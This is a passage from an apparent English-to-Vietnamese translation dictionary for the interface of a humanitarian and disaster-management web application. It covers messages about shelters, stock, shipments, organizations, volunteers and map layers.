Alternative Items currently registered': 'Hiện không có mặt hàng thay thế nào được đăng ký', 'No Assessment Answers': 'Không có câu trả lời cho đánh giá', 'No Assessment Questions': 'Không có câu hỏi đánh giá', 'No Assessment Templates': 'Không có mẫu đánh giá', 'No Assessments currently registered': 'Hiện chưa có đánh giá nào được đăng ký', 'No Assets currently registered': 'Hiện không có tài sản nào được đăng ký', 'No Awards found': 'Không tìm thấy thông tin về khen thưởng', 'No Base Layer': 'Không có lớp bản đồ cơ sở', 'No Beneficiaries Found': 'Không tìm thấy người hưởng lợi nào', 'No Beneficiary Types Found': 'Không tìm thấy nhóm người hưởng lợi nào', 'No Branch Organizations currently registered': 'Hiện không có tổ chức cơ sở nào được đăng ký', 'No Brands currently registered': 'Hiện không có nhãn hàng nào được đăng ký', 'No Catalog Items currently registered': 'Hiện không có mặt hàng nào trong danh mục được đăng ký', 'No Catalogs currently registered': 'Hiện không có danh mục nào được đăng ký', 'No Category<>Sub-Category<>Catalog Relation currently registered': 'Hiện tại chưa có Category<>Sub-Category<>Catalog Relation được đăng ký', 'No Clusters currently registered': 'Hiện không có nhóm nào được đăng ký', 'No Commitment Items currently registered': 'Hiện không có hàng hóa cam kết nào được đăng ký', 'No Commitments': 'Không có cam kết nào', 'No Communities Found': 'Không tìm thấy cộng đồng nào', 'No Completed Assessment Forms': 'Không có mẫu khảo sát đánh giá hoàn thiện nào', 'No Contacts Found': 'Không tìm thấy liên lạc nào', 'No Data currently defined for this Theme Layer': 'Hiện không xác định được dữ liệu nào cho lớp chủ đề này', 'No Data': 'Không có dữ liệu', 'No Disaster Assessments': 'Không có đánh giá thảm họa nào', 'No Distribution Items currently registered': 'Chưa đăng ký danh sách hàng hóa đóng góp', 'No Documents found': 'Không tìm thấy tài liệu nào', 'No Donors currently registered': 'Hiện không có nhà tài trợ nào được đăng ký', 'No Emails currently in InBox': 'Hiện không có thư điện tử nào trong hộp thư đến', 'No Entries Found': 'Không có hồ sơ nào được tìm thấy', 'No Facilities currently registered': 'Hiện không có trang thiết bị nào được đăng ký', 'No Facility Types currently registered': 'Không có bộ phận nào được đăng ký', 'No Feature Layers currently defined': 'Hiện không xác định được lớp đặc điểm nào', 'No File Chosen': 'Chưa chọn File', 'No Flood Reports currently registered': 'Chưa đăng ký báo cáo lũ lụt', 'No Frameworks found': 'Không tìm thấy khung chương trình nào', 'No Groups currently defined': 'Hiện tại không xác định được nhóm', 'No Groups currently registered': 'Hiện không có nhóm nào được đăng ký', 'No Hazards currently registered': 'Hiện không có hiểm họa nào được đăng ký', 'No Hospitals currently registered': 'Chưa có bệnh viện nào đăng ký', 'No Human Resources currently assigned to this incident': 'Hiện không có nhân sự nào được phân công cho công việc này', 'No Identities currently registered': 'Hiện không có nhận diện nào được đăng ký', 'No Image': 'Không có ảnh', 'No Images currently registered': 'Hiện không có hình ảnh nào được đăng ký', 'No Incident Reports currently registered': 'Hiện không có báo cáo sự việc nào được đăng ký', 'No Incidents currently registered': 'Hiện chưa có sự việc nào được đăng ký', 'No Inventories currently have suitable alternative items in stock': 'Hiện không có bảng kiểm kê nào có mặt hàng thay thế trong kho', 'No Inventories currently have this item in stock': 'Hiện không có bảng kiểm kê nào có mặt hàng này trong kho', 'No Item 
Categories currently registered': 'Hiện không có nhóm mặt hàng nào được đăng ký', 'No Item Packs currently registered': 'Hiện không có gói hàng nào được đăng ký', 'No Items currently registered': 'Hiện không có mặt hàng nào được đăng ký', 'No Items currently requested': 'Hiện tại không có hàng hóa nào được yêu cầu', 'No Kits': 'Không có thùng hàng nào', 'No Layers currently configured in this Profile': 'Hiện không có lớp nào được tạo ra trong hồ sơ này', 'No Layers currently defined in this Symbology': 'Hiện không xác định được lớp nào trong biểu tượng này', 'No Layers currently defined': 'Hiện không xác định được lớp nào', 'No Location Hierarchies currently defined': 'Hiện không xác định được thứ tự địa điểm', 'No Locations Found': 'Không tìm thấy địa điểm nào', 'No Locations currently available': 'Hiện không có địa điểm', 'No Locations currently registered': 'Hiện tại chưa có vị trí nào được đăng ký', 'No Mailing List currently established': 'Hiện không có danh sách địa chỉ thư nào được thiết lập', 'No Map Profiles currently defined': 'Hiện không xác định được cài đặt cấu hình bản đồ nào', 'No Markers currently available': 'Hiện không có dấu mốc nào', 'No Match': 'Không phù hợp', 'No Matching Catalog Items': 'Không có mặt hàng nào trong danh mục phù hợp', 'No Matching Items': 'Không có mặt hàng phù hợp', 'No Matching Records': 'Không có hồ sơ phù hợp', 'No Members currently registered': 'Hiện không có hội viên nào được đăng ký', 'No Memberships currently defined': 'Chưa xác nhận đăng ký thành viên', 'No Messages currently in Outbox': 'Hiện không có thư nào trong hộp thư đi', 'No Metadata currently defined': 'Hiện tại không xác định được loại siêu dữ liệu', 'No Milestones Found': 'Không tìm thấy sự kiện quan trọng nào', 'No Office Types currently registered': 'Hiện không có loại hình văn phòng nào được đăng ký', 'No Offices currently registered': 'Hiện không có văn phòng nào được đăng ký', 'No Open Tasks for %(project)s': 'Không có công việc chưa được xác định nào cho %(project)s', 'No Orders registered': 'Không có đề nghị nào được đăng ký', 'No Organization Domains currently registered': 'Không có lĩnh vực hoạt động của tổ chức nào được đăng ký', 'No Organization Types currently registered': 'Hiện không có loại hình tổ chức nào được đăng ký', 'No Organizations currently registered': 'Hiện không có tổ chức nào được đăng ký', 'No Organizations for Project(s)': 'Không có tổ chức cho dự án', 'No Organizations found for this Framework': 'Không tìm thấy tổ chức trong chương trình khung này', 'No Packs for Item': 'Không có hàng đóng gói', 'No Partner Organizations currently registered': 'Hiện không có tổ chức đối tác nào được đăng ký', 'No People currently committed': 'Hiện không có người nào cam kết', 'No People currently registered in this shelter': 'Không có người đăng ký cư trú ở đơn vị này', 'No Persons currently registered': 'Hiện không có người nào đăng ký', 'No Persons currently reported missing': 'Hiện tại không thấy báo cáo về người mất tích', 'No Photos found': 'Không tìm thấy hình ảnh', 'No PoIs available.': 'Không có PoIs', 'No Presence Log Entries currently registered': 'Hiện chưa có ghi chép nhật ký được đăng ký', 'No Professional Experience found': 'Không tìm thấy kinh nghiệm nghề nghiệp', 'No Profiles currently have Configurations for this Layer': 'Hiện không có hồ sơ nào có cài đặt cấu hình cho lớp này', 'No Projections currently defined': 'Hiện không xác định được phép chiếu nào', 'No Projects currently registered': 'Hiện không có dự án nào được đăng ký', 'No Question 
Meta-Data': 'Không có siêu dữ liệu lớn câu hỏi', 'No Ratings for Skill Type': 'Không xếp loại cho loại kỹ năng', 'No Received Shipments': 'Không có chuyến hàng nào được nhận', 'No Records currently available': 'Hiện tại không có hồ sơ nào sẵn có', 'No Red Cross & Red Crescent National Societies currently registered': 'Hiện không có Hội Chữ thập đỏ và Trăng lưỡi liềm đỏ quốc gia nào được đăng ký', 'No Request Items currently registered': 'Hiện không có mặt hàng đề nghị nào được đăng ký', 'No Requests': 'Không có đề nghị', 'No Roles defined': 'Không có vai trò nào được xác định ', 'No Rooms currently registered': 'Hiện không có phòng nào được đăng ký', 'No Search saved': 'Không có tìm kiếm nào được lưu', 'No Sectors currently registered': 'Hiện không có lĩnh vực nào được đăng ký', 'No Sent Shipments': 'Không có chuyến hàng nào được gửi', 'No Settings currently defined': 'Hiện không có cài đặt nào được xác định', 'No Shelters currently registered': 'Hiện tại chưa đăng ký nơi cư trú', 'No Shipment Items': 'Không có hàng hóa vận chuyển nào', 'No Shipment Transit Logs currently registered': 'Không có số liệu lưu về vận chuyển được ghi nhận', 'No Skill Types currently set': 'Chưa cài đặt loại kỹ năng', 'No Skills currently requested': 'Hiện không có kỹ năng nào được đề nghị', 'No Staff currently registered': 'Hiện không có cán bộ nào được đăng ký', 'No Statuses currently registered': 'Hiện không có tình trạng nào được đăng ký', 'No Stock currently registered in this Warehouse': 'Hiện không có hàng hóa nào được đăng ký trong nhà kho này', 'No Stock currently registered': 'Hiện không có hàng hóa nào được đăng ký', 'No Storage Bin Type currently registered': 'Chưa đăng ký Loại Bin lưu trữ', 'No Suppliers currently registered': 'Hiện không có nhà cung cấp nào được đăng ký', 'No Support Requests currently registered': 'Hiện tại không có yêu cầu hỗ trợ nào được đăng ký', 'No Survey Questions currently registered': 'Hiện tại không có câu hỏi khảo sát nào được đăng ký', 'No Symbologies currently defined for this Layer': 'Hiện không xác định được biểu tượng nào cho lớp này', 'No Symbologies currently defined': 'Hiện không xác định được biểu tượng nào', 'No Tasks Assigned': 'Không có công việc nào được giao', 'No Teams currently registered': 'Hiện không có Đội/Nhóm nào được đăng ký', 'No Template Sections': 'Không có phần về biểu mẫu', 'No Themes currently registered': 'Hiện không có chủ đề nào được đăng ký', 'No Tickets currently registered': 'Hiện tại chưa đăng ký Ticket ', 'No Time Logged': 'Không có thời gian nào được ghi lại', 'No Twilio Settings currently defined': 'Hiện không có cài đặt Twilio nào được xác định', 'No Units currently registered': 'Chưa đăng ký tên đơn vị', 'No Users currently registered': 'Hiện không có người sử dụng nào được đăng ký', 'No Vehicles currently assigned to this incident': 'Hiện không có phương tiện vận chuyển nào được điều động cho sự việc này', 'No Volunteer Cluster Positions': 'Không có vị trí của nhóm tình nguyện viên', 'No Volunteer Cluster Types': 'Không có loại hình nhóm tình nguyện viên', 'No Volunteer Clusters': 'Không có nhóm tình nguyện viên', 'No Volunteers currently registered': 'Hiện không có tình nguyện viên nào được đăng ký', 'No Warehouses currently registered': 'Hiện không có nhà kho nào được đăng ký', 'No access at all': 'Không truy cập', 'No access to this record!': 'Không tiếp cận được bản lưu này!', 'No annual budgets found': 'Không tìm thấy bản ngân sách năm', 'No contact information available': 'Không có thông tin liên hệ', 'No contact method 
found': 'Không tìm thấy cách thức liên hệ', 'No contacts currently registered': 'Chưa đăng ký thông tin liên lạc', 'No data available in table': 'Không có dữ liệu trong bảng', 'No data available': 'Không có dữ liệu sẵn có', 'No data in this table - cannot create PDF!': 'Không có dữ liệu trong bảng - không thể tạo file PDF', 'No databases in this application': 'Không có cơ sở dữ liệu trong ứng dụng này', 'No demographic data currently available': 'Hiện không xác định được dữ liệu nhân khẩu', 'No demographic sources currently defined': 'Hiện không xác định được nguồn nhân khẩu', 'No demographics currently defined': 'Hiện không xác định được số liệu thống kê dân số', 'No education details currently registered': 'Hiện không có thông tin về học vấn được đăng ký', 'No entries currently available': 'Hiện chưa có hồ sơ nào', 'No entries found': 'Không có hồ sơ nào được tìm thấy', 'No entry available': 'Chưa có hồ sơ nào', 'No file chosen': 'Chưa chọn file', 'No forms to the corresponding resource have been downloaded yet.': 'Không tải được mẫu nào cho nguồn tài nguyên tương ứng', 'No further users can be assigned.': 'Không thể phân công thêm người sử dụng', 'No items currently in stock': 'Hiện không có mặt hàng nào trong kho', 'No items have been selected for shipping.': 'Không có mặt hàng nào được lựa chọn để vận chuyển', 'No jobs configured yet': 'Chưa thiết lập công việc', 'No jobs configured': 'Không thiết lập công việc', 'No linked records': 'Không có bản thu liên quan', 'No location information defined!': 'Không xác định được thông tin về địa điểm!', 'No match': 'Không phù hợp', 'No matching element found in the data source': 'Không tìm được yếu tố phù hợp từ nguồn dữ liệu', 'No matching records found': 'Không tìm thấy hồ sơ phù hợp', 'No matching result': 'Không có kết quả phù hợp', 'No membership types currently registered': 'Hiện không có loại hình hội viên nào được đăng ký', 'No messages in the system': 'Không có thư nào trong hệ thống', 'No offices registered for organisation': 'Không có văn phòng nào đăng ký tổ chức', 'No options available': 'Không có lựa chọn sẵn có', 'No outputs defined': 'Không tìm thấy đầu ra', 'No pending registrations found': 'Không tìm thấy đăng ký đang chờ', 'No pending registrations matching the query': 'Không tìm thấy đăng ký khớp với yêu cầu', 'No problem group defined yet': 'Chưa xác định được nhóm gặp nạn', 'No records in this resource': 'Không có hồ sơ nào trong tài nguyên này', 'No records in this resource. Add one more records manually and then retry.': 'Không có hồ sơ nào trong tài nguyên này. 
Thêm một hoặc nhiều hồ sơ một cách thủ công và sau đó thử lại ', 'No records to delete': 'Không có bản thu để xóa', 'No records to review': 'Không có hồ sơ nào để rà soát', 'No report available.': 'Không có báo cáo', 'No reports available.': 'Không có báo cáo nào', 'No repositories configured': 'Không có chỗ chứa hàng nào được tạo ra', 'No requests found': 'Không tìm thấy yêu cầu', 'No resources configured yet': 'Chưa có nguồn lực nào được tạo ra', 'No role to delete': 'Không có chức năng nào để xóa', 'No roles currently assigned to this user.': 'Hiện tại không có chức năng nào được cấp cho người sử dụng này', 'No service profile available': 'Không có hồ sơ đăng ký dịch vụ nào', 'No staff or volunteers currently registered': 'Hiện không có cán bộ hay tình nguyện viên nào được đăng ký', 'No stock adjustments have been done': 'Không có bất kỳ điều chỉnh nào về hàng hóa', 'No synchronization': 'Chưa đồng bộ hóa', 'No tasks currently registered': 'Hiện không có công việc nào được đăng ký', 'No template found!': 'Không tìm thấy mẫu', 'No themes found': 'Không tìm thấy chủ đề nào', 'No translations exist in spreadsheet': 'Không có phần dịch trong bảng tính', 'No users with this role at the moment.': 'Hiện tại không có người sử dụng nào có chức năng này', 'No valid data in the file': 'Không có dữ liệu có giá trị trong tệp tin', 'No volunteer information registered': 'Chưa đăng ký thông tin tình nguyện viên', 'No vulnerability aggregated indicators currently defined': 'Hiện không xác định được chỉ số tổng hợp về tình trạng dễ bị tổn thương', 'No vulnerability data currently defined': 'Hiện không xác định được dữ liệu về tình trạng dễ bị tổn thương', 'No vulnerability indicator Sources currently defined': 'Hiện không xác định được nguồn chỉ số về tình trạng dễ bị tổn thương', 'No vulnerability indicators currently defined': 'Hiện không xác định được chỉ số về tình trạng dễ bị tổn thương', 'No': 'Không', 'Non-Communicable Diseases': 'Bệnh không lây nhiễm', 'None (no such record)': 'Không cái nào (không có bản lưu như thế)', 'None': 'Không có', 'Nonexistent or invalid resource': 'Không tồn tại hoặc nguồn lực không hợp lệ', 'Noodles': 'Mì', 'Normal Job': 'Công việc hiện nay', 'Normal': 'Bình thường', 'Not Authorized': 'Không được phép', 'Not Set': 'Chưa thiết đặt', 'Not implemented': 'Không được thực hiện', 'Not installed or incorrectly configured.': 'Không được cài đặt hoặc cài đặt cấu hình không chính xác', 'Not yet a Member of any Group': 'Chưa là thành viên của nhóm nào', 'Not you?': 'Không phải bạn chứ?', 'Note that when using geowebcache, this can be set in the GWC config.': 'Lưu ý khi sử dụng geowebcache, phần này có thể được cài đặt trong cấu hình GWC.', 'Note: Make sure that all the text cells are quoted in the csv file before uploading': 'Lưu ý: Đảm bảo tất cả các ô chữ được trích dẫn trong tệp tin csv trước khi tải lên', 'Notice to Airmen': 'Lưu ý cho phi công', 'Notification frequency': 'Tần suất thông báo', 'Notification method': 'Phương pháp thông báo', 'Notify': 'Thông báo', 'Number of Completed Assessment Forms': 'Số phiếu đánh giá đã được hoàn chỉnh', 'Number of People Affected': 'Số người bị ảnh hưởng', 'Number of People Dead': 'Số người chết', 'Number of People Injured': 'Số người bị thương', 'Number of People Required': 'Số người cần', 'Number of Rows': 'Số hàng', 'Number of alternative places for studying': 'Số địa điểm có thể dùng làm trường học tạm thời', 'Number of newly admitted patients during the past 24 hours.': 'Số lượng bệnh nhân tiếp nhận trong 24h qua', 
'Number of private schools': 'Số lượng trường tư', 'Number of religious schools': 'Số lượng trường công giáo', 'Number of vacant/available beds in this hospital. Automatically updated from daily reports.': 'Số các giường bệnh trống trong bệnh viện. Tự động cập nhật từ các báo cáo hàng ngày.', 'Number or Label on the identification tag this person is wearing (if any).': 'Số hoặc nhãn trên thẻ nhận diện mà người này đang đeo (nếu có)', 'Number': 'Số', 'Number/Percentage of affected population that is Female & Aged 0-5': 'Đối tượng nữ trong độ tuổi 0-5 tuổi chịu ảnh hưởng của thiên tai ', 'Number/Percentage of affected population that is Female & Aged 6-12': 'Đối tượng nữ trong độ tuổi 6-12 chịu ảnh hưởng của thiên tai', 'Number/Percentage of affected population that is Male & Aged 0-5': 'Đối tượng nam trong độ tuổi 0-5 chịu ảnh hưởng từ thiên tai', 'Number/Percentage of affected population that is Male & Aged 18-25': 'Đối tượng nam giới trong độ tuổi 18-25 chịu ảnh hưởng của thiên tai', 'Number/Percentage of affected population that is Male & Aged 26-60': 'Đối tượng là Nam giới và trong độ tuổi từ 26-60 chịu ảnh hưởng lớn từ thiên tai', 'Numbers Only': 'Chỉ dùng số', 'Numeric': 'Bằng số', 'Nutrition': 'Dinh dưỡng', 'OCR Form Review': 'Mẫu OCR tổng hợp', 'OCR module is disabled. Ask the Server Administrator to enable it.': 'Module OCR không được phép. Yêu cầu Quản trị mạng cho phép', 'OCR review data has been stored into the database successfully.': 'Dự liệu OCR tổng hợp đã được lưu thành công vào kho dữ liệu', 'OK': 'Đồng ý', 'OSM file generation failed!': 'Chiết xuất tệp tin OSM đã bị lỗi!', 'OSM file generation failed: %s': 'Chiết xuất tệp tin OSM đã bị lỗi: %s', 'OTHER DATA': 'DỮ LIỆU KHÁC', 'OTHER REPORTS': 'BÁO CÁO KHÁC', 'OVERALL RESILIENCE': 'SỰ BỀN VỮNG TỔNG THỂ', 'Object': 'Đối tượng', 'Objectives': 'Mục tiêu', 'Observer': 'Người quan sát', 'Obsolete': 'Đã thôi hoạt động', 'Obstetrics/Gynecology': 'Sản khoa/Phụ khoa', 'Office Address': 'Địa chỉ văn phòng', 'Office Details': 'Thông tin về văn phòng', 'Office Phone': 'Điện thoại văn phòng', 'Office Type Details': 'Thông tin về loại hình văn phòng', 'Office Type added': 'Loại hình văn phòng được thêm vào', 'Office Type deleted': 'Loại hình văn phòng đã xóa', 'Office Type updated': 'Loại hình văn phòng được cập nhật', 'Office Type': 'Loại hình văn phòng', 'Office Types': 'Loại văn phòng', 'Office added': 'Văn phòng được thêm vào', 'Office deleted': 'Văn phòng đã xóa', 'Office updated': 'Văn phòng được cập nhật', 'Office': 'Văn phòng', 'Office/Center': 'Văn phòng/Trung tâm', 'Office/Warehouse/Facility': 'Trụ sở làm việc', 'Officer': 'Chuyên viên', 'Offices': 'Văn phòng', 'Old': 'Người già', 'On Hold': 'Tạm dừng', 'On Order': 'Theo đề nghị', 'On by default?': 'Theo mặc định?', 'One item is attached to this shipment': 'Một mặt hàng được bổ sung thêm vào kiện hàng này', 'One-time costs': 'Chí phí một lần', 'Ongoing': 'Đang thực hiện', 'Only showing accessible records!': 'Chỉ hiển thị hồ sơ có thể truy cập', 'Only use this button to accept back into stock some items that were returned from a delivery to beneficiaries who do not record the shipment details directly into the system': 'Chỉ sử dụng nút này để nhận lại vào kho một số mặt hàng được trả lại do người nhận không trực tiếp lưu thông tin về kiện hàng này trên hệ thống', 'Only use this button to confirm that the shipment has been received by a destination which will not record the shipment directly into the system': 'Chỉ sử dụng nút này để xác nhận kiện hàng đã được nhận tại một địa 
điểm không trực tiếp lưu thông tin về kiện hàng trên hệ thống', 'Oops! Something went wrong...': 'Xin lỗi! Có lỗi gì đó…', 'Oops! something went wrong on our side.': 'Xin lỗi! Có trục trặc gì đó từ phía chúng tôi.', 'Opacity': 'Độ mờ', 'Open Incidents': 'Mở sự kiện', 'Open Map': 'Mở bản đồ', 'Open Tasks for %(project)s': 'Các công việc chưa xác định cho %(project)s', 'Open Tasks for Project': 'Mở nhiệm vụ cho một dự án', 'Open recent': 'Mở gần đây', 'Open': 'Mở', 'OpenStreetMap Layer': 'Mở lớp bản đồ đường đi', 'OpenStreetMap OAuth Consumer Key': 'Mã khóa người sử dụng OpenStreetMap OAuth', 'OpenStreetMap OAuth Consumer Secret': 'Bí mật người sử dụng OpenStreetMap OAuth', 'OpenWeatherMap Layer': 'Lớp OpenWeatherMap (bản đồ thời tiết mở)', 'Operating Rooms': 'Phòng điều hành', 'Operation not permitted': 'Hoạt động không được phép', 'Option Other': 'Lựa chọn khác', 'Option': 'Lựa chọn', 'Optional Subject to put into Email - can be used as a Security Password by the service provider': 'Chủ đề tùy chọn để đưa vào Thư điện tử - có thể được sử dụng như một Mật khẩu bảo mật do nhà cung cấp dịch vụ cung cấp', 'Optional password for HTTP Basic Authentication.': 'Mật khẩu tùy chọn cho Sự xác thực cơ bản HTTP.', 'Optional selection of a MapServer map.': 'Tùy chọn một bản đồ trong Máy chủ bản đồ.', 'Optional selection of a background color.': 'Tùy chọn màu sắc cho nền.', 'Optional selection of an alternate style.': 'Tùy chọn một kiểu dáng thay thế.', 'Optional username for HTTP Basic Authentication.': 'Tên truy nhập tùy chọn cho Sự xác thực cơ bản HTTP.', 'Optional. If you wish to style the features based on values of an attribute, select the attribute to use here.': 'Tùy chọn. Nếu bạn muốn tự tạo ra chức năng dựa trên các giá trị của một thuộc tính, hãy lựa chọn thuộc tính để sử dụng tại đây.', 'Optional. In GeoServer, this is the Workspace Namespace URI (not the name!). Within the WFS getCapabilities, this is the FeatureType Name part before the colon(:).': 'Tùy chọn. Trong máy chủ về địa lý, đây là Vùng tên Vùng làm việc URI (không phải là một tên gọi!). Trong lớp WFS theo khả năng là đường dẫn, đây là phần Tên loại chức năng trước dấu hai chấm (:).', 'Optional. The name of an element whose contents should be a URL of an Image file put into Popups.': 'Tùy chọn. Tên của một bộ phận có chứa nội dung là một URL của một tệp tin hình ảnh được đưa vào các cửa sổ tự động hiển thị.', 'Optional. The name of an element whose contents should be put into Popups.': 'Tùy chọn. Tên của một bộ phận có chứa nội dung được đưa vào các cửa sổ tự động hiển thị.', 'Optional. The name of the schema. In Geoserver this has the form http://host_name/geoserver/wfs/DescribeFeatureType?version=1.1.0&;typename=workspace_name:layer_name.': 'Tùy chọn. Tên của sơ đồ. 
Trong Geoserver tên này có dạng http://host_name/geoserver/wfs/DescribeFeatureType?version=1.1.0&;typename=workspace_name:layer_name.', 'Options': 'Các lựa chọn', 'Or add a new language code': 'Hoặc thêm một mã ngôn ngữ mới', 'Order Created': 'Đơn hàng đã tạo', 'Order Details': 'Thông tin đơn hàng', 'Order Due %(date)s': 'Thời hạn của đơn hàng %(date)s', 'Order Item': 'Các mặt hàng trong đơn hàng', 'Order canceled': 'Đơn hàng đã bị hủy', 'Order updated': 'Đơn hàng được cập nhật', 'Order': 'Đơn hàng', 'Orders': 'Các đơn hàng', 'Organization Details': 'Thông tin về tổ chức', 'Organization Domain Details': 'Thông tin về lĩnh vực hoạt động của tổ chức', 'Organization Domain added': 'Lĩnh vực hoạt động của tổ chức đã được thêm', 'Organization Domain deleted': 'Lĩnh vực hoạt động của tổ chức đã được xóa', 'Organization Domain updated': 'Lĩnh vực hoạt động của tổ chức đã được cập nhật', 'Organization Domains': 'Loại hình hoạt động của tổ chức', 'Organization Registry': 'Đăng ký tổ chức', 'Organization Type Details': 'Thông tin về loại hình tổ chức', 'Organization Type added': 'Loại hình tổ chức được thêm vào', 'Organization Type deleted': 'Loại hình tổ chức đã xóa', 'Organization Type updated': 'Loại hình tổ chức được cập nhật', 'Organization Type': 'Loại hình tổ chức', 'Organization Types': 'Loại hình tổ chức', 'Organization Units': 'Đơn vị của tổ chức', 'Organization added to Framework': 'Tổ chức được thêm vào Chương trình khung', 'Organization added to Project': 'Tổ chức được thêm vào Dự án', 'Organization added': 'Tổ chức được thêm vào', 'Organization deleted': 'Tổ chức đã xóa', 'Organization removed from Framework': 'Tổ chức đã rút ra khỏi Chương trình khung', 'Organization removed from Project': 'Tổ chức đã rút ra khỏi Dự án', 'Organization updated': 'Tổ chức được cập nhật', 'Organization': 'Tổ chức', 'Organization/Supplier': 'Tổ chức/ Nhà cung cấp', 'Organizational Development': 'Phát triển tổ chức', 'Organizations / Teams / Facilities': 'Tổ chức/ Đội/ Cơ sở hạ tầng', 'Organizations': 'Tổ chức', 'Organized By': 'Đơn vị tổ chức', 'Origin': 'Nguồn gốc', 'Original Quantity': 'Số lượng ban đầu', 'Original Value per Pack': 'Giá trị ban đầu cho mỗi gói hàng', 'Other Address': 'Địa chỉ khác', 'Other Details': 'Thông tin khác', 'Other Employment': 'Quá trình công tác ngoài Chữ thập đỏ', 'Other Evidence': 'Bằng chứng khác', 'Other Faucet/Piped Water': 'Vòi nước/nước máy khác', 'Other Inventories': 'Kho hàng khác', 'Other Isolation': 'Những vùng bị cô lập khác', 'Other Users': 'Người sử dụng khác', 'Other activities of boys 13-17yrs': 'Các hoạt động khác của nam thanh niên từ 13-17 tuổi', 'Other activities of boys <12yrs before disaster': 'Các hoạt động khác của bé trai dưới 12 tuổi trước khi xảy ra thiên tai', 'Other alternative places for study': 'Những nơi có thể dùng làm trường học tạm thời', 'Other assistance needed': 'Các hỗ trợ cần thiết', 'Other assistance, Rank': 'Những sự hỗ trợ khác,thứ hạng', 'Other data': 'Dữ liệu khác', 'Other factors affecting school attendance': 'Những yếu tố khác ảnh hưởng đến việc đến trường', 'Other reports': 'Báo cáo khác', 'Other settings can only be set by editing a file on the server': 'Cài đặt khác chỉ có thể được cài đặt bằng cách sửa đổi một tệp tin trên máy chủ', 'Other side dishes in stock': 'Món trộn khác trong kho', 'Other': 'Khác', 'Others': 'Khác', 'Outbound Mail settings are configured in models/000_config.py.': 'Cài đặt thư gửi đi được cấu hình trong models/000_config.py.', 'Outbox': 'Hộp thư đi', 'Outcomes, Impact, Challenges': 'Kết 
quả, Tác động, Thách thức', 'Outgoing SMS handler': 'Bộ quản lý tin nhắn SMS gửi đi', 'Output added': 'Đầu ra được thêm vào', 'Output deleted': 'Đầu ra đã xóa', 'Output updated': 'Đầu ra được cập nhật', 'Output': 'Đầu ra', 'Outputs': 'Các đầu ra', 'Over 60': 'Trên 60', 'Overall Resilience': 'Sự bền vững tổng thể', 'Overland Flow Flood': 'Dòng nước lũ lụt trên đất liền', 'Overlays': 'Lớp dữ liệu phủ', 'Owned By (Organization/Branch)': 'Sở hữu bởi (Tổ chức/ Chi nhánh)', 'Owned Records': 'Hồ sơ được sở hữu', 'Owned Resources': 'Nguồn lực thuộc sở hữu', 'Owner Driven Housing Reconstruction': 'Xây lại nhà theo nhu cầu của chủ nhà', 'Owning Organization': 'Tổ chức nắm quyền sở hữu', 'PASSA': 'Phương pháp tiếp cận có sự tham gia về nhận thức an toàn nhà ở', 'PIL (Python Image Library) not installed': 'PIL (thư viện ảnh Python) chưa cài đặt', 'PIL (Python Image Library) not installed, images cannot be embedded in the PDF report': 'PIL (thư viện ảnh Python) chưa được cài đặt, hình ảnh không thể gắn vào báo cáo dạng PDF', 'PIN number from Twitter (leave empty to detach account)': 'Số PIN từ Twitter (để trống để tách tài khoản)', 'PMER Development': 'Phát triển năng lực Báo cáo, đánh giá, giám sát và lập kế hoạch (PMER)', 'POOR': 'NGHÈO', 'POPULATION DENSITY': 'MẬT ĐỘ DÂN SỐ', 'POPULATION:': 'DÂN SỐ:', 'Pack': 'Gói', 'Packs': 'Các gói', 'Page': 'Trang', 'Paid': 'Đã nộp', 'Pan Map: keep the left mouse button pressed and drag the map': 'Di chuyển bản đồ: giữ chuột trái và di chuột để di chuyển bản đồ', 'Parameters': 'Tham số', 'Parent Item': 'Mặt hàng cùng gốc', 'Parent Project': 'Dự án cùng gốc', 'Parent needs to be of the correct level': 'Phần tử cấp trên cần ở mức chính xác', 'Parent needs to be set for locations of level': 'Phần tử cấp trên cần được cài đặt cho các điểm mức độ', 'Parent needs to be set': 'Phần tử cấp trên cần được cài đặt', 'Parent': 'Phần tử cấp trên', 'Parser Setting deleted': 'Cài đặt của bộ phân tích đã xóa', 'Parser Settings': 'Các cài đặt của bộ phân tích', 'Parsing Settings': 'Cài đặt cú pháp', 'Parsing Status': 'Tình trạng phân tích', 'Parsing Workflow': 'Quá trình phân tích', 'Part of the URL to call to access the Features': 'Phần URL để gọi để truy cập tới chức năng', 'Part-time': 'Kiêm nhiệm', 'Partial': 'Một phần', 'Participant Details': 'Thông tin về người tham dự', 'Participant added': 'Người tham dự được thêm vào', 'Participant deleted': 'Người tham dự đã xóa', 'Participant updated': 'Người tham dự được cập nhật', 'Participant': 'Người tham dự', 'Participants': 'Những người tham dự', 'Participating Organizations': 'Các tổ chức tham gia', 'Partner National Society': 'Hội Quốc gia thành viên', 'Partner Organization Details': 'Thông tin về tổ chức đối tác', 'Partner Organization added': 'Tổ chức đối tác được thêm vào', 'Partner Organization deleted': 'Tổ chức đối tác đã xóa', 'Partner Organization updated': 'Tổ chức đối tác đã được cập nhật', 'Partner Organizations': 'Tổ chức đối tác', 'Partner': 'Đối tác', 'Partners': 'Đối tác', 'Partnerships': 'Hợp tác', 'Pass': 'Qua', 'Passport': 'Hộ chiếu', 'Password to use for authentication at the remote site.': 'Mật khẩu để sử dụng để xác định tại một địa điểm ở xa', 'Password': 'Mật khẩu', 'Pathology': 'Bệnh lý học', 'Patients': 'Bệnh nhân', 'Pediatric ICU': 'Chuyên khoa nhi', 'Pediatric Psychiatric': 'Khoa Tâm thần dành cho bệnh nhi', 'Pediatrics': 'Khoa Nhi', 'Peer Registration Request': 'Yêu cầu đăng ký', 'Peer registration request added': 'Đã thêm yêu cầu đăng ký', 'Peer registration request updated': 'Cập nhật yêu cầu đăng 
